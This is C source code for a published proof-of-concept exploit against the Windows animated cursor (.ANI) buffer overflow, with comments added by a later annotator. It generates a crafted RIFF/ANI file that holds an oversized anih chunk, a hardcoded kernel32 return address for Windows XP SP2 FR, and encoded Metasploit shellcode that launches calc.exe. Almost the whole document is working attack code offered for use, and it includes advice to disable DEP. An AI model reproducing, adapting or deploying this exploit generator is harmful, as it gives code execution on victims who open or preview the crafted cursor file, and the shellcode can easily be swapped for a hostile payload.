
# Title : MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu


/***************************************************************************
*              MS Windows .ANI File Local Buffer Overflow                  *
*                                                                          *
*                                                                          *
* Credits go to Trirat Puttaraksa, whose PoC inspired this source.         *
* devcode's exploit didn't work for me, so I made my own.                  *
* This exploit launches calc.exe from a lot of apps (Word, Winamp, etc.).  *
* Turn off DEP to get it to work in Explorer (DEP blocks the shellcode).   *
*                                                                          *
* Tested against Win XP SP2 FR (the return address is from its kernel32).  *
* Have Fun!                                                                *
*                                                                          *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                              *
***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* memcpy, memset */

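/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Metasploit-generated x86 payload that spawns calc.exe: 164 bytes, encoded
 * with PexFnstenvSub.  None of the bytes below is 0x00, which matters because
 * main() copies it using the literal's length.
 * The "\x" escapes had been stripped in the archived listing; they are
 * restored here so the literal holds the opcodes rather than ASCII text.
 */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68"
"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b"
"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01"
"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b"
"\x43\x45\x32\xe3";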

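/*
 * RIFF/ACON container the cursor loader parses, 88 bytes.  Layout (file offsets):
 *   0  "RIFF" <size 0x313> "ACON"
 *  12  "anih" <size 0x24>, then 36 bytes that, read as the documented
 *      ANIHEADER, give cbSize=0x24, cFrames=0xffff, cSteps=9, cx=cy=0,
 *      cBitCount=cPlanes=0, JifRate=4, flags=1
 *  56  "TSIL" <size 3> + 4 zero bytes; 68 "TSIL" <size 4> + 02 02 02 02
 *  80  "anih" <size 0xffff> -- a second anih chunk whose length field is far
 *      larger than an ANIHEADER; everything main() places after this header
 *      (filler, return address at file offset 168, shellcode at 245) is the
 *      data of this chunk, which presumably is what overruns the parser's
 *      fixed-size buffer.
 * The "\x" escapes were stripped in the archived listing and are restored here.
 */
unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x13\x03\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xff\xff\x00\x00\x09\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x04\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4c\x03\x00\x00\x00"
"\x00\x00\x00\x00\x54\x53\x49\x4c\x04\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6e\x69\x68\xff\xff\x00\x00";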

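/*
 * Byte offsets inside the generated file.  They are tied to the build the
 * author tested (Win XP SP2 FR): the return address is an address in that
 * build's kernel32.dll, and the two offsets presumably depend on the same
 * build's parser.
 */
enum {
	ANI_BUF_SIZE     = 66000,	/* scratch buffer; slightly larger than the file */
	ANI_FILE_SIZE    = 65623,	/* bytes written to disk */
	RET_ADDR_OFFSET  = 168,		/* overwritten return address; 80 bytes into the 2nd anih data */
	SHELLCODE_OFFSET = 245,		/* start of CalcShellcode */
	FILL_BYTE        = 'C'		/* every byte not covered by the pieces above */
};

/* 0x7c801a7b, little-endian: "CALL ESI" in kernel32.dll according to the author. */
static const unsigned char ret_addr[4] = { 0x7b, 0x1a, 0x80, 0x7c };

/*
 * Assemble the .ANI image in buf: RIFF header (Ani_headers), 'C' filler,
 * return address, then the shellcode.  Lengths come from the literals
 * (sizeof - 1) rather than strlen(), so a payload containing 0x00 can never
 * be silently truncated.
 *
 * Returns the number of bytes to write, or 0 when cap is too small or the
 * pieces would overlap.
 */
static size_t build_ani(unsigned char *buf, size_t cap)
{
	const size_t hdr_len = sizeof Ani_headers - 1;
	const size_t sc_len = sizeof CalcShellcode - 1;

	if (cap < ANI_FILE_SIZE
	    || hdr_len > RET_ADDR_OFFSET
	    || RET_ADDR_OFFSET + sizeof ret_addr > SHELLCODE_OFFSET
	    || SHELLCODE_OFFSET + sc_len > ANI_FILE_SIZE) {
		return 0;
	}

	memset(buf, FILL_BYTE, ANI_FILE_SIZE);
	memcpy(buf, Ani_headers, hdr_len);
	memcpy(buf + RET_ADDR_OFFSET, ret_addr, sizeof ret_addr);
	memcpy(buf + SHELLCODE_OFFSET, CalcShellcode, sc_len);
	return ANI_FILE_SIZE;
}

/*
 * Usage: <prog> <file.ani>
 *
 * Writes the crafted cursor file to the given path.  Returns 0 on success
 * and 1 on bad usage or any file error, so a calling script can tell the
 * difference (the "\n" escapes in the messages were also lost in the
 * archived listing and are restored).
 */
int main(int argc, char *argv[])
{
	static unsigned char evilbuff[ANI_BUF_SIZE];	/* static: keeps 64 KiB off the stack */
	const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "ani";
	FILE *anifile;
	size_t len, written;

	printf("[+] MS Windows .ANI File Buffer Overflow  \n");
	printf("[+] Greetz to Trirat Puttaraksa\n");
	printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc != 2) {
		printf("[+] Usage: %s <file.ani>\n", prog);
		return 1;
	}

	len = build_ani(evilbuff, sizeof evilbuff);
	if (len == 0) {
		printf("[-] Payload does not fit the file layout.\n");
		return 1;
	}

	/* "wb": no CR/LF translation on Windows, the bytes must land verbatim. */
	if ((anifile = fopen(argv[1], "wb")) == NULL) {
		printf("[-] Unable to access file.\n");
		return 1;
	}
	written = fwrite(evilbuff, 1, len, anifile);
	/* fclose() performs the final flush; a short write shows up in either check. */
	if (fclose(anifile) != 0 || written != len) {
		printf("[-] Write to %s failed.\n", argv[1]);
		return 1;
	}
	printf("[+] Done. Have fun!\n");
	return 0;
}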
